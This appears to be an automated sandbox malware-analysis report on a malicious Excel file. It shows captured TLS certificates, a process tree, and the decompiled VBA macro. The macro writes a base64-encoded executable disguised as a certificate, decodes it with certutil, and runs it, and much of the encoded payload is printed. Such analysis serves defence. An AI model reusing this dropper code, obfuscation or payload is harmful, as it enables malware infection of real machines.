E7 39 09 01 B4 60 95 t..(G0..%.9...`.0090: 1D F4 64 65 9B DD 63 EC AE 40 36 F4 9C 7B C9 4D ..de..c..@6....M00A0: 93 A4 78 58 17 39 AC FE 69 AA BC 79 AD E5 02 24 ..xX.9..i..y...$00B0: F3 2D 6D 44 09 3B E6 1D 9F 0D 9B 28 37 2E B8 1B .-mD.;.....(7...00C0: 85 59 FE 35 A6 B7 B7 32 EF 9C B2 46 FB C6 95 9A .Y.5...2...F....00D0: F0 0F 6D BC D4 15 96 C9 5D 43 88 33 7D 6E 41 16 ..m.....]C.3.nA.00E0: 5D CA A7 06 FC 2D 66 AD 2E DB 1D E4 C9 32 F7 2C ]....-f......2.,00F0: 28 C0 04 0E BE 98 9F 19 03 1B 88 48 CA A0 02 CE (..........H....]
Mar 1, 2018 09:57:46.660196066 CET	443	49177	172.217.3.174	192.168.2.2	CN=Google Internet Authority G2, O=Google Inc, C=US	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	Mon May 22 13:32:37 CEST 2017	Tue Jan 01 00:59:59 CET 2019	[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Mon May 22 13:32:37 CEST 2017, To: Tue Jan 01 00:59:59 CET 2019] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 01002125 88b0fa59 a777ef05 7b6627df]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: CA 49 E5 AC D7 64 64 77 5B BE 71 FA CF F4 1E 23 .I...ddw[.q....#0010: C7 9A 69 63 54 5F EB 4C D6 19 28 23 64 66 8E 1C ..icT_.L..(#df..0020: C7 87 80 64 5F 04 8B 26 AF 98 DF 0A 70 BC BC 19 ...d_..&....p...0030: 3D EE 7B 33 A9 7F BD F4 05 D4 70 BB 05 26 79 EA =..3......p..&y.0040: 9A C7 98 B9 07 19 65 34 CC 3C E9 3F C5 01 FA 6F ......e4.<.?...o0050: 0C 7E DB 7A 70 5C 4C FE 2D 00 F0 CA BE 2D 8E B4 ...zp\L.-....-..0060: A8 80 FB 01 13 88 CB 9C 3F E5 BB 77 CA 3A 67 36 ........?..w.:g60070: F3 CE D5 27 02 72 43 A0 BD 6E 02 F1 47 05 71 3E ...'.rC..n..G.q>0080: 01 59 E9 11 9E 1A F3 84 0F 80 A6 A2 78 35 2F B6 .Y..........x5/.0090: C7 A2 7F 17 7C E1 8B 56 AE EE 67 88 51 27 30 60 .......V..g.Q'0`00A0: A5 62 52 C3 37 D5 3B EA 85 2A 01 38 87 A2 CF 70 .bR.7.;..*.8...p00B0: AD A4 7A C9 C4 E7 CA C5 DA BC 23 32 F2 FE 18 C2 ..z.......#2....00C0: 7B E0 DF 3B 2F D4 D0 10 E6 96 4C FB 44 B7 21 64 ...;/.....L.D.!d00D0: 0D B9 00 94 30 12 26 87 58 98 39 05 38 0F CC 82 ....0.&.X.9.8...00E0: 48 0C 0A 47 66 EE BF B4 5F C4 FF 70 A8 E1 7F 8B H..Gf..._..p....00F0: 79 2B B8 65 32 A3 B9 B7 31 E9 0A F5 F6 1F 32 DC y+.e2...1.....2.]
Mar 1, 2018 09:57:46.660196066 CET	443	49177	172.217.3.174	192.168.2.2	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	OU=Equifax Secure Certificate Authority, O=Equifax, C=US	Tue May 21 06:00:00 CEST 2002	Tue Aug 21 06:00:00 CEST 2018	[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3300 Parent PID: 3024

General

Start time:	09:56:48
Start date:	01/03/2018
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Imagebase:	0x2f890000
File size:	20392608 bytes
MD5 hash:	716335EDBB91DA84FC102425BFDA957E
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: certutil.exe PID: 3388 Parent PID: 3300

General

Start time:	09:56:52
Start date:	01/03/2018
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -decode C:\Programdata\M8N5M9S4.txt C:\Programdata\M4P9S1S3.exe
Imagebase:	0x130000
File size:	903168 bytes
MD5 hash:	0D52559AEF4AA5EAC82F530617032283
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: M4P9S1S3.exe PID: 3412 Parent PID: 3300

General

Start time:	09:56:54
Start date:	01/03/2018
Path:	C:\ProgramData\M4P9S1S3.exe
Wow64 process (32bit):	false
Commandline:	C:\Programdata\M4P9S1S3.exe
Imagebase:	0x240000
File size:	133632 bytes
MD5 hash:	36524C90CA1FAC2102E7653DFADB31B2
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: rundll32.exe PID: 3432 Parent PID: 3412

General

Start time:	09:56:54
Start date:	01/03/2018
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\rundll32.exe' 'C:\Users\user\AppData\Local\cdnver.dll',#1
Imagebase:	0x50000
File size:	45056 bytes
MD5 hash:	C648901695E275C8F2AD04B687A68CE2
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: OUTLOOK.EXE PID: 3688 Parent PID: 3300

General

Start time:	09:57:08
Start date:	01/03/2018
Path:	C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
Wow64 process (32bit):	false
Commandline:	'C:\PROGRA~1\MICROS~2\Office14\OUTLOOK.EXE' -c IPM.Note /m 'mailto:tchung@smi-online.co.uk'
Imagebase:	0x2fa30000
File size:	15988376 bytes
MD5 hash:	E8D2BEEE0809B48D1DF1B86252EDC0D3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: LinesOfBusiness

Declaration

Line	Content
1	Attribute VB_Name = "LinesOfBusiness"
3	#if VBA7 then
4	Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds as LongPtr)
5	#else
6	Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds as Long)
7	#endif

Executed Functions

Subroutine cutil, APIs: 25, Strings: 9, Number of lines: 22, Relevance: 90.022

APIs	Meta Information
vbNewLine
vbNewLine
rndname
rndname
CreateObject	CreateObject("Scripting.FileSystemObject")
Part of subcall function GetRand@LinesOfBusiness: Randomize
Part of subcall function GetRand@LinesOfBusiness: Chr
Part of subcall function GetRand@LinesOfBusiness: Int
Part of subcall function GetRand@LinesOfBusiness: Rnd
Part of subcall function GetRand@LinesOfBusiness: Int
Part of subcall function GetRand@LinesOfBusiness: Rnd
Part of subcall function GetRand@LinesOfBusiness: Randomize
Part of subcall function GetRand@LinesOfBusiness: Chr
Part of subcall function GetRand@LinesOfBusiness: Int
Part of subcall function GetRand@LinesOfBusiness: Rnd
Part of subcall function GetRand@LinesOfBusiness: Int
Part of subcall function GetRand@LinesOfBusiness: Rnd
CreateObject	CreateObject("Scripting.FileSystemObject")
CreateTextFile	FileSystemObject.CreateTextFile("C:\Programdata\M8N5M9S4.txt",True)
Write	TextStream.Write("-----BEGIN CERTIFICATE----- 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)
Close
Shell	Shell("certutil -decode C:\Programdata\M8N5M9S4.txt C:\Programdata\M4P9S1S3.exe") -> 3388
Chr
kernel32!Sleep	kernel32!Sleep(2000)
Shell	Shell("C:\Programdata\M4P9S1S3.exe") -> 3412

Strings	Decrypted Strings
"-----BEG""IN CER""TIFICATE-----"
"-----BEG""IN CER""TIFI""CATE-----"
"C:\Programdata\"
"C:\Programdata\"
"Scr""ipting.FileSy""stemObject"
"C:\Programdata\"
"C:\Programdata\"
"Scr""ipting.FileSy""stemOb""ject"
"certutil -decode "

Line	Instruction	Meta Information
35	Sub cutil(code as String)
36	Dim x as String	executed
38	x = "-----BEG" & "IN CER" & "TIFICATE-----"
39	x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
40	x = x + vbNewLine	vbNewLine
41	x = x + code
42	x = x + vbNewLine	vbNewLine
43	x = x + "-----E" & "ND CERTIF" & "ICATE-----"
45	Dim path as String
46	path = "C:\Programdata\" & rndname & ".txt"	rndname
47	expath = "C:\Programdata\" & rndname & ".exe"	rndname
49	Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")	CreateObject("Scripting.FileSystemObject") executed
50	path = "C:\Programdata\" & GetRand & ".txt"
51	expath = "C:\Programdata\" & GetRand & ".exe"
53	Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")	CreateObject("Scripting.FileSystemObject") executed
54	Set file = scr.CreateTextFile(path, True)	FileSystemObject.CreateTextFile("C:\Programdata\M8N5M9S4.txt",True) executed
55	file.Write x	TextStream.Write("-----BEGIN CERTIFICATE----- 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) executed
56	file.Close	Close
